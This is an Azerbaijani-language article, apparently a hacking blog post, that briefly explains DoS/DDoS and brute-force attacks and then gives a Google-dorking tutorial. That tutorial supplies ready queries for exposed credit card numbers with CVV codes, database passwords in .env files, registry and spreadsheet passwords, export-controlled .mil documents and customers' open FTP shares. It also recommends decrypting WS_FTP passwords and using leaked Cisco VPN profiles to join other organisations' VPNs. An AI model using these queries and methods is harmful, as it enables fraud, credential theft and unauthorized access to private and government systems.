    DoS (İngilis dilindən Xidmətdən imtina - denial of service) kompüter sisteminə xaker hücumudur və onun uğursuzluğuna səbəb olur. Bu, vicdanlı sistem istifadəçilərinin təqdim olunan sistem resurslarına (serverlərinə) daxil ola bilməyəcəyi şəraitin yaradılmasıdır və ya bu giriş çətinləşir. Sistemin nasazlığı, fövqəladə vəziyyətdə proqram təminatı hər hansı kritik məlumat istehsal edərsə, onun ələ keçirilməsi istiqamətində bir addım ola bilər: məsələn, versiya, proqram kodunun bir hissəsi və s. Lakin bu, çox vaxt iqtisadi təzyiq ölçüsüdür: gəlir gətirən sadə bir xidmətin itirilməsi. Provayderin hesabları və ya hücumun qarşısını almaq üçün tədbirlər cibdəki "hədəfi" əhəmiyyətli dərəcədə vurur.

    DoS və DDos hücumu arasındakı fərq nədir?

    DoS ağıllı şəkildə hazırlanmış bir hücumdur. Məsələn, əgər server daxil olan paketlərin düzgünlüyünü yoxlamazsa, o zaman haker emalı sonsuza qədər davam edəcək sorğu verə bilər və digər bağlantılarla işləmək üçün kifayət qədər prosessor vaxtı olmayacaq. Müvafiq olaraq, müştərilər xidmətdən imtina edəcəklər. Amma böyük tanınmış saytları bu şəkildə yükləmək və ya söndürmək mümkün olmayacaq. Onlar kifayət qədər geniş kanallar və heç bir problem olmadan belə həddindən artıq yüklənmənin öhdəsindən gələ biləcək super güclü serverlərlə silahlanmışdırlar.

    DDoS əslində DoS ilə eyni hücumdur. Ancaq DoS-də bir sorğu paketi varsa, DDoS-da yüzlərlə və ya daha çox ola bilər. Hətta super güclü serverlər belə həddindən artıq yüklənmənin öhdəsindən gələ bilməyəcəklər. Sizə bir misal deyim.

    DoS hücumu, kiminləsə söhbət edərkən, lakin sonra hansısa tərbiyəsiz adam gəlib yüksək səslə qışqırmağa başlayır. Danışmaq ya qeyri-mümkündür, ya da çox çətindir. Həll yolu: mühafizə xidmətinə zəng edin, kim sakitləşdirəcək və şəxsi binadan çıxaracaq. DDoS hücumları minlərlə bu cür tərbiyəsiz insanların izdihamının içəri girməsidir. Belə olan halda mühafizə hamını bağlayıb apara bilməyəcək.

    DoS və DDoS zombi adlanan kompüterlərdən həyata keçirilir. Bunlar hakerlər tərəfindən sındırılmış istifadəçilərin kompüterləridir, hətta onların maşınının hər hansı bir serverə hücumda iştirak etdiyindən şübhələnmirlər.

    Özünüzü bundan necə qorumalısınız? Ümumiyyətlə, yol yoxdur. Ancaq bir haker üçün işləri daha da çətinləşdirə bilərsiniz. Bunun üçün güclü serverlərə malik yaxşı hostinq seçmək lazımdır.

    Bruteforce hücumu

    Tərtibatçı çoxlu hücumdan qorunma sistemləri ilə çıxış edə bilər, yazdığımız skriptləri tam nəzərdən keçirə bilər, saytı zəifliklərə görə yoxlaya bilər və s. Lakin o, veb-sayt tərtibatının son mərhələsinə çatdıqda, yəni sadəcə idarəetmə paneli üçün parol təyin etdikdə bir şeyi unuda bilər. Parol!

    Sadə parol təyin etmək qətiyyən tövsiyə edilmir. Bu, 12345, 1114457, vasya111 və s. ola bilər. 10-11 simvoldan az parol təyin etmək tövsiyə edilmir. Əks təqdirdə, ən çox yayılmış və mürəkkəb olmayan hücuma məruz qala bilərsiniz - Brute force.

    Brute force xüsusi proqramlardan istifadə edərək lüğət parol axtarışı hücumudur. Lüğətlər müxtəlif ola bilər: Latın, rəqəmlərlə sadalama, məsələn, müəyyən diapazona qədər, qarışıq (latın + rəqəmlər) və hətta unikal simvolları olan lüğətlər var @#4$%&*~~`’”\ ? və s.

    Əlbəttə ki, bu cür hücumların qarşısını almaq asandır. Hətta captcha sizi xilas edə bilər. Həmçinin, əgər saytınız CMS-də hazırlanıbsa, o zaman onların çoxu bu tip hücumları aşkarlayır və IP-ni bloklayır. Həmişə yadda saxlamalısınız ki, parolda nə qədər fərqli simvol varsa, onu təxmin etmək bir o qədər çətindir.

    Hakerlər necə işləyir? Əksər hallarda onlar ya parolun bir hissəsini əvvəlcədən bilirlər, ya da şübhələnirlər. İstifadəçinin parolunun 3 və ya 5 simvoldan ibarət olmayacağını güman etmək olduqca məntiqlidir. Bu cür parollar tez-tez haker hücumlarına səbəb olur. Əsasən, hakerlər 5-dən 10-a qədər simvol götürür və əvvəlcədən bildikləri bir neçə simvol əlavə edirlər. Sonra, tələb olunan diapazonlu parollar yaradılır. Kali Linux paylamasında belə hallar üçün proqramlar var. Və voila, hücum artıq uzun sürməyəcək, çünki lüğətin həcmi artıq o qədər də böyük deyil. Bundan əlavə, haker video kartın gücündən istifadə edə bilər. Bəziləri CUDA sistemini dəstəkləyir və axtarış sürəti 10 dəfəyə qədər artır. İndi isə belə sadə şəkildə hücumun olduqca real olduğunu görürük. Ancaq kobud gücə məruz qalan yalnız veb saytlar deyil.

    Hörmətli tərtibatçılar, informasiya təhlükəsizliyi sistemini heç vaxt unutmayın, çünki bu gün bir çox insanlar, o cümlədən dövlətlər belə hücumlardan əziyyət çəkirlər. Axı, ən böyük zəiflik həmişə bir yerdə diqqətini yayındıra bilən və ya bir şeyi əldən verə bilən bir insandır. Biz proqramçıyıq, lakin proqramlaşdırılmış maşınlar deyilik. Həmişə ehtiyatlı olun, çünki məlumatın itirilməsi ciddi nəticələrə səbəb ola bilər!

    Şəxsi məlumatların əldə edilməsi həmişə hakerlik demək deyil - bəzən açıq şəkildə dərc olunur. Google parametrlərini bilmək və bir az ixtiraçılıq sizə bir çox maraqlı şeyləri - kredit kartı nömrələrindən tutmuş FTB sənədlərinə qədər tapmağa imkan verəcək.

    XƏBƏRDARLIQ Bütün məlumatlar yalnız məlumat məqsədləri üçün verilir. Nə redaktorlar, nə də müəllif bu məqalənin materiallarının vurduğu hər hansı zərərə görə məsuliyyət daşımır.

    Bu gün hər şey İnternetə bağlıdır, girişi məhdudlaşdırmaq üçün çox az narahatlıq var. Buna görə də, bir çox şəxsi məlumatlar axtarış motorlarının yırtıcısına çevrilir. Hörümçək robotları artıq internet səhifələri ilə məhdudlaşmır, internetdə mövcud olan bütün məzmunu indeksləşdirir və daim öz verilənlər bazasına ictimai olmayan məlumatları əlavə edir. Bu sirləri tapmaq asandır - sadəcə onlar haqqında necə soruşacağınızı bilməlisiniz.

    Fayllar axtarılır

    Bacarıqlı əllərdə Google İnternetdə tapılmayan hər şeyi, məsələn, şəxsi məlumatlar və rəsmi istifadə üçün fayllar tez bir zamanda tapacaq. Onlar tez-tez bir xalça altında bir açar kimi gizlənirlər: heç bir real giriş məhdudiyyəti yoxdur, məlumatlar sadəcə saytın arxasında yerləşir, burada heç bir keçid yoxdur. Standart Google veb interfeysi yalnız əsas inkişaf etmiş axtarış parametrlərini təmin edir, lakin hətta bunlar kifayət edəcəkdir.

    Siz iki operatordan istifadə edərək Google axtarışınızı xüsusi fayl növü ilə məhdudlaşdıra bilərsiniz: filetype və ext. Birincisi, axtarış sisteminin fayl başlığından müəyyən etdiyi formatı, ikincisi daxili məzmunundan asılı olmayaraq fayl uzantısını təyin edir. Hər iki halda axtarış edərkən, yalnız genişləndirməni təyin etməlisiniz. Başlanğıcda ext operatoru faylın xüsusi format xüsusiyyətlərinə malik olmadığı hallarda istifadə etmək üçün əlverişli idi (məsələn, hər hansı bir şeyi ehtiva edə bilən ini və cfg konfiqurasiya fayllarını axtarmaq üçün). İndi Google-un alqoritmləri dəyişib və operatorlar arasında görünən fərq yoxdur - əksər hallarda nəticələr eynidir.


    Nəticələrin süzülməsi

    Varsayılan olaraq, Google indekslənmiş səhifələrdəki bütün fayllarda sözləri və ümumiyyətlə hər hansı daxil edilmiş simvolları axtarır. Axtarış sahəsini yüksək səviyyəli domen, müəyyən bir sayt və ya faylların özlərində axtarış ardıcıllığının yeri ilə məhdudlaşdıra bilərsiniz. İlk iki seçim üçün sayt operatorunu, ardınca domenin və ya seçilmiş saytın adını istifadə edin. Üçüncü halda, operatorların bütün dəsti xidmət sahələrində və metadatalarda məlumat axtarmağa imkan verir. Məsələn, allinurl verilmiş olanı linklərin özündə, allinanchor - etiketlə təchiz olunmuş mətndə tapacaq. , allintitle - səhifə başlıqlarında, allintext - səhifələrin mətnində.

    Hər bir operator üçün daha qısa adı olan yüngül versiya var (hamısı prefiksi olmadan). Fərq ondadır ki, allinurl bütün sözlərlə əlaqə tapacaq, inurl isə yalnız onlardan birincisi ilə əlaqə tapacaq. Sorğunun ikinci və sonrakı sözləri veb səhifələrin istənilən yerində görünə bilər. inurl operatoru da oxşar məna daşıyan başqa operatordan - saytdan fərqlənir. Birincisi, həmçinin, məlum zəiflikləri olan komponentləri tapmaq üçün geniş istifadə olunan, axtarılan sənədə keçiddə (məsələn, /cgi-bin/) istənilən simvol ardıcıllığını tapmağa imkan verir.

    Gəlin bunu praktikada sınayaq. Biz allintext filtrini götürürük və sorğuda yalnız iki ildən sonra (və ya onların sahibləri hamını qidalandırmaqdan yorulanda) müddəti bitəcək kredit kartlarının nömrələrinin və təsdiq kodlarının siyahısını hazırlayırıq.

    Allintext: kartın nömrəsinin istifadə müddəti /2017 cvv

    Xəbərlərdə gənc hakerin gizli məlumatları oğurlayaraq Pentaqonun və ya NASA-nın "serverlərinə girdiyini" oxuduğunuzda, əksər hallarda Google-dan istifadənin məhz belə bir əsas texnikasından danışırıq. Tutaq ki, bizi NASA işçilərinin siyahısı və onların əlaqə məlumatları maraqlandırır. Şübhəsiz ki, belə bir siyahı elektron formada mövcuddur. Rahatlıq üçün və ya nəzarətə görə o, təşkilatın internet saytında da ola bilər. Məntiqlidir ki, bu halda ona heç bir keçid olmayacaq, çünki o, daxili istifadə üçün nəzərdə tutulub. Belə bir faylda hansı sözlər ola bilər? Ən azı - "ünvan" sahəsi. Bütün bu fərziyyələri yoxlamaq asandır.


    Inurl:nasa.gov fayl növü:xlsx "ünvan"


    Biz bürokratiyadan istifadə edirik

    Bu kimi tapıntılar xoş bir toxunuşdur. Google-un vebmasterlər üçün operatorları, Şəbəkənin özü və axtarılan strukturun xüsusiyyətləri haqqında daha ətraflı məlumat həqiqətən möhkəm tutma ilə təmin edilir. Təfərrüatları bilməklə, qalan hissələrdə həqiqətən dəyərli məlumatları əldə etmək üçün nəticələri asanlıqla filtrləyə və lazımi faylların xüsusiyyətlərini dəqiqləşdirə bilərsiniz. Burada bürokratiyanın köməyə gəlməsi gülməlidir. Təsadüfən İnternetə sızan gizli məlumatları axtarmaq üçün əlverişli olan standart formulalar istehsal edir.

    Məsələn, ABŞ Müdafiə Nazirliyi tərəfindən tələb olunan Dağıtım bəyanatı möhürü sənədin yayılmasına standartlaşdırılmış məhdudiyyətlər deməkdir. A hərfi heç bir sirr olmayan ictimai buraxılışları ifadə edir; B - yalnız daxili istifadə üçün nəzərdə tutulmuşdur, C - ciddi məxfidir və F-ə qədər davam edir. X hərfi ayrıca seçilir və bu, ən yüksək səviyyəli dövlət sirrini təmsil edən xüsusilə qiymətli məlumatları qeyd edir. Bunu vəzifə başında yerinə yetirməli olanlar belə sənədləri axtarsınlar və biz özümüzü C hərfi olan fayllarla məhdudlaşdıracağıq. DoDI 5230.24 direktivinə əsasən, bu işarə ixrac nəzarətinə düşən kritik texnologiyaların təsvirini ehtiva edən sənədlərə təyin edilir. . Bu cür diqqətlə qorunan məlumatları ABŞ Ordusu üçün ayrılmış ən yüksək səviyyəli domain.mil saytlarında tapa bilərsiniz.

    "PAYLAŞMA BƏYANATI C" inurl:navy.mil

    Çox rahatdır ki, .mil domenində yalnız ABŞ Müdafiə Nazirliyi və onun müqavilə təşkilatlarının saytları var. Domen məhdudiyyəti olan axtarış nəticələri son dərəcə təmizdir və başlıqlar özləri üçün danışır. Rus sirlərini bu şəkildə axtarmaq praktiki olaraq faydasızdır: domains.ru və.rf-də xaos hökm sürür və bir çox silah sistemlərinin adları botanika (PP “Kiparis”, özüyeriyən silahlar “Akatsia”) və ya hətta inanılmaz ( TOS "Buratino").


    .mil domenindəki saytdan istənilən sənədi diqqətlə öyrənərək, axtarışınızı dəqiqləşdirmək üçün digər markerləri görə bilərsiniz. Məsələn, "Sec 2751" ixrac məhdudiyyətlərinə istinad, bu da maraqlı texniki məlumatları axtarmaq üçün əlverişlidir. Zaman zaman bir dəfə göründüyü rəsmi saytlardan silinir, buna görə də axtarış nəticələrində maraqlı bir keçidi izləyə bilmirsinizsə, Google-un önbelleğini (keş operatoru) və ya İnternet Arxivi saytından istifadə edin.

    Buludlara dırmaşmaq

    Təsadüfən məxfilikdən çıxarılan dövlət sənədlərinə əlavə olaraq, Dropbox-dan şəxsi fayllara keçidlər və ictimai şəkildə dərc edilmiş məlumatlara “özəl” bağlantılar yaradan digər məlumat saxlama xidmətləri vaxtaşırı Google-un keşində açılır. Alternativ və evdə hazırlanmış xidmətlərlə daha da pisdir. Məsələn, aşağıdakı sorğu FTP serveri quraşdırılmış və öz marşrutlaşdırıcısından fəal şəkildə istifadə edən bütün Verizon müştəriləri üçün məlumatları tapır.

    Allinurl: ftp:// verizon.net

    İndi qırx mindən çox belə ağıllı insan var və 2015-ci ilin yazında onların sayı daha çox idi. Verizon.net əvəzinə hər hansı tanınmış provayderin adını əvəz edə bilərsiniz və o, nə qədər məşhur olarsa, tutma da bir o qədər böyük ola bilər. Daxili FTP server vasitəsilə siz marşrutlaşdırıcıya qoşulmuş xarici yaddaş cihazında faylları görə bilərsiniz. Adətən bu, uzaqdan iş, şəxsi bulud və ya bir növ həmyaşıd fayl yükləməsi üçün NAS-dır. Bu cür medianın bütün məzmunu Google və digər axtarış motorları tərəfindən indekslənir, beləliklə siz birbaşa keçid vasitəsilə xarici disklərdə saxlanılan fayllara daxil ola bilərsiniz.

    Konfiqurasiyalara baxırıq

    Buluda geniş miqrasiyadan əvvəl sadə FTP serverləri uzaqdan saxlama funksiyasını yerinə yetirirdi, bu da bir çox zəifliklərə malikdir. Onların bir çoxu bu gün də aktualdır. Məsələn, məşhur WS_FTP Professional proqramı konfiqurasiya məlumatlarını, istifadəçi hesablarını və parolları ws_ftp.ini faylında saxlayır. Onu tapmaq və oxumaq asandır, çünki bütün qeydlər mətn formatında saxlanılır və parollar minimal qarışıqlıqdan sonra Üçlü DES alqoritmi ilə şifrələnir. Əksər versiyalarda birinci baytı atmaq kifayətdir.

    WS_FTP Password Decryptor yardım proqramı və ya pulsuz veb xidmətindən istifadə edərək belə parolların şifrəsini açmaq asandır.

    İxtiyari veb saytı sındırmaqdan danışarkən, onlar adətən CMS və ya e-ticarət proqramlarının konfiqurasiya fayllarının qeydlərindən və ehtiyat nüsxələrindən parol əldə etməyi nəzərdə tuturlar. Onların tipik quruluşunu bilirsinizsə, açar sözləri asanlıqla göstərə bilərsiniz. Ws_ftp.ini-də tapılan xətlər çox yaygındır. Məsələn, Drupal və PrestaShop-da həmişə istifadəçi identifikatoru (UID) və müvafiq parol (pwd) var və bütün məlumatlar .inc uzantılı fayllarda saxlanılır. Onları aşağıdakı kimi axtara bilərsiniz:

    "pwd=" "UID=" ext:inc

    DBMS parollarının aşkarlanması

    SQL serverlərinin konfiqurasiya fayllarında istifadəçi adları və e-poçt ünvanları aydın mətndə saxlanılır və parol əvəzinə onların MD5 heşləri yazılır. Düzünü desək, onların şifrəsini açmaq mümkün deyil, lakin məlum hash-parol cütləri arasında uyğunluq tapa bilərsiniz.

    Hələ də parol heşinqindən istifadə etməyən DBMS-lər var. Onlardan hər hansı birinin konfiqurasiya fayllarına sadəcə brauzerdə baxmaq olar.

    Mətn:DB_PASSWORD fayl növü:env

    Windows serverlərinin yaranması ilə konfiqurasiya fayllarının yeri qismən reyestr tərəfindən tutuldu. Siz fayl növü kimi reg-dən istifadə edərək, onun filiallarında eyni şəkildə axtarış edə bilərsiniz. Məsələn, bu kimi:

    Fayl növü:reg HKEY_CURRENT_USER "Parol"=

    Aşkar olanı unutmayaq

    Bəzən təsadüfən açılmış və Google-un diqqətinə düşən məlumatlardan istifadə edərək məxfi məlumatlara çatmaq olur. İdeal seçim bəzi ümumi formatda parolların siyahısını tapmaqdır. Yalnız ümidsiz insanlar hesab məlumatlarını mətn faylında, Word sənədində və ya Excel cədvəlində saxlaya bilər, lakin onların sayı həmişə kifayətdir.

    Fayl növü:xls inurl:parol

    Bir tərəfdən belə hadisələrin qarşısını almaq üçün çoxlu vasitələr var. Htaccess-də adekvat giriş hüquqlarını təyin etmək, CMS-i yamaq, solaxay skriptlərdən istifadə etməmək və digər boşluqları bağlamaq lazımdır. Axtarış motorlarına orada göstərilən faylları və qovluqları indeksləşdirməyi qadağan edən robots.txt istisnalarının siyahısı olan bir fayl da var. Digər tərəfdən, əgər hansısa serverdə robots.txt strukturu standartdan fərqlənirsə, onda onların orada nəyi gizlətməyə çalışdıqları dərhal aydın olur.

    İstənilən saytdakı qovluqların və faylların siyahısından əvvəl standart indeksdir. Xidmət məqsədləri üçün o, başlıqda görünməli olduğundan, onun axtarışını intitle operatoru ilə məhdudlaşdırmağın mənası var. Maraqlı şeylər /admin/, /personal/, /etc/ və hətta /secret/ kataloqlarındadır.

    Yeniliklər üçün bizi izləyin

    Burada aktuallıq son dərəcə vacibdir: köhnə boşluqlar çox yavaş bağlanır, lakin Google və onun axtarış nəticələri daim dəyişir. Hətta “son saniyə” filtri (&tbs=qdr:s sorğu URL-nin sonunda) və “real vaxt” filtri (&tbs=qdr:1) arasında fərq var.

    Faylın son yeniləmə tarixinin vaxt intervalı da Google tərəfindən gizli şəkildə göstərilir. Qrafik veb interfeysi vasitəsilə siz standart dövrlərdən birini (saat, gün, həftə və s.) seçə və ya tarix diapazonunu təyin edə bilərsiniz, lakin bu üsul avtomatlaşdırma üçün uyğun deyil.

    Ünvan panelinin görünüşündən siz yalnız &tbs=qdr: konstruksiyasından istifadə edərək nəticələrin çıxışını məhdudlaşdırmağın bir yolunu təxmin edə bilərsiniz. Ondan sonrakı y hərfi bir il limitini təyin edir (&tbs=qdr:y), m son ayın nəticələrini, w - həftə üçün, d - ötən gün, h - son saat, n - dəqiqə üçün və s - mənə bir saniyə verin. Google-un indicə məlum etdiyi ən son nəticələr &tbs=qdr:1 filtrindən istifadə etməklə tapılır.

    Ağıllı bir skript yazmağınız lazımdırsa, tarix diapazonunun Google-da Julian formatında daterange operatorundan istifadə edərək təyin olunduğunu bilmək faydalı olacaq. Məsələn, 2015-ci il yanvarın 1-dən iyulun 1-dək yüklənmiş məxfi sözü olan PDF sənədlərinin siyahısını belə tapa bilərsiniz.

    Məxfi fayl növü:pdf tarix diapazonu:2457024-2457205

    Aralıq fraksiyalı hissə nəzərə alınmadan Julian tarix formatında göstərilir. Onları Qriqorian təqvimindən əl ilə tərcümə etmək əlverişsizdir. Tarix çeviricisindən istifadə etmək daha asandır.

    Yenidən hədəfləmə və filtrləmə

    Axtarış sorğusunda əlavə operatorları göstərməklə yanaşı, onlar birbaşa keçidin mətnində göndərilə bilər. Məsələn, filetype:pdf spesifikasiyası as_filetype=pdf konstruksiyasına uyğundur. Bu, hər hansı bir aydınlıq soruşmağı asanlaşdırır. Deyək ki, yalnız Honduras Respublikasından olan nəticələrin çıxışı axtarış URL-inə cr=countryHN konstruksiyasını əlavə etməklə və yalnız Bobruisk şəhərindən - gcs=Bobruisk-dən müəyyən edilir. Tam siyahını tərtibatçı bölməsində tapa bilərsiniz.

    Google-un avtomatlaşdırma vasitələri həyatı asanlaşdırmaq üçün nəzərdə tutulub, lakin onlar tez-tez problemlər yaradır. Məsələn, istifadəçinin IP-si WHOIS vasitəsilə şəhərini müəyyən etmək üçün istifadə olunur. Bu məlumatlara əsasən, Google serverlər arasında yükü tarazlaşdırmaqla yanaşı, axtarış nəticələrini də dəyişir. Bölgədən asılı olaraq eyni sorğu üçün ilk səhifədə fərqli nəticələr görünəcək və bəziləri tamamilə gizlənə bilər. gl=country direktivindən sonrakı iki hərfli kod sizə kosmopolit kimi hiss etməyə və istənilən ölkədən məlumat axtarmağa kömək edəcək. Məsələn, Hollandiyanın kodu NL-dir, lakin Vatikan və Şimali Koreyanın Google-da öz kodu yoxdur.

    Çox vaxt axtarış nəticələri bir neçə təkmil filtrdən istifadə etdikdən sonra dağınıq olur. Bu halda sorğuya bir neçə istisna sözləri əlavə etməklə aydınlaşdırmaq asandır (hər birinin qarşısında mənfi işarə qoyulur). Məsələn, bank işi, adlar və dərslik çox vaxt Personal sözü ilə istifadə olunur. Beləliklə, daha təmiz axtarış nəticələri sorğunun dərslik nümunəsi ilə deyil, dəqiqləşdirilmiş bir nümunə ilə göstəriləcəkdir:

    Başlıq:"Index of /Personal/" -adlar -tutorial -banking

    Son bir misal

    Mürəkkəb bir haker, ehtiyac duyduğu hər şeyi təkbaşına təmin etməsi ilə fərqlənir. Məsələn, VPN əlverişli bir şeydir, lakin ya bahalı, ya da müvəqqəti və məhdudiyyətlərlə. Tək özünüz üçün abunə olmaq çox bahadır. Qrup abunəliklərinin olması yaxşıdır və Google-un köməyi ilə qrupun bir hissəsi olmaq asandır. Bunu etmək üçün kifayət qədər qeyri-standart PCF uzantısına və tanınan yola malik Cisco VPN konfiqurasiya faylını tapın: Program Files\Cisco Systems\VPN Client\Profiles. Bir xahiş və siz, məsələn, Bonn Universitetinin mehriban komandasına qoşulun.

    Fayl növü:pcf vpn VEYA Qrup

    INFO Google parolları olan konfiqurasiya fayllarını tapır, lakin onların çoxu şifrələnmiş formada yazılır və ya heşlərlə əvəz olunur. Sabit uzunluqdakı sətirləri görürsünüzsə, dərhal şifrənin açılması xidmətini axtarın.

    Parollar şifrələnmiş şəkildə saxlanılır, lakin Maurice Massard artıq onların şifrəsini açmaq üçün proqram yazıb və onu thecampusgeeks.com vasitəsilə pulsuz təqdim edir.

    Google yüzlərlə müxtəlif növ hücumlar və nüfuzetmə testləri həyata keçirir. Populyar proqramlara, əsas verilənlər bazası formatlarına, PHP-nin çoxsaylı zəifliklərinə, buludlara və s. təsir edən bir çox variant var. Axtardığınızı dəqiq bilmək sizə lazım olan məlumatı (xüsusilə də ictimaiyyətə açıqlamaq niyyətində olmadığınız məlumatları) tapmağı xeyli asanlaşdıracaq. Shodan maraqlı ideyalarla qidalanan yeganə deyil, indeksləşdirilmiş şəbəkə resurslarının hər bir verilənlər bazasıdır!

    
    Kateqoriyalar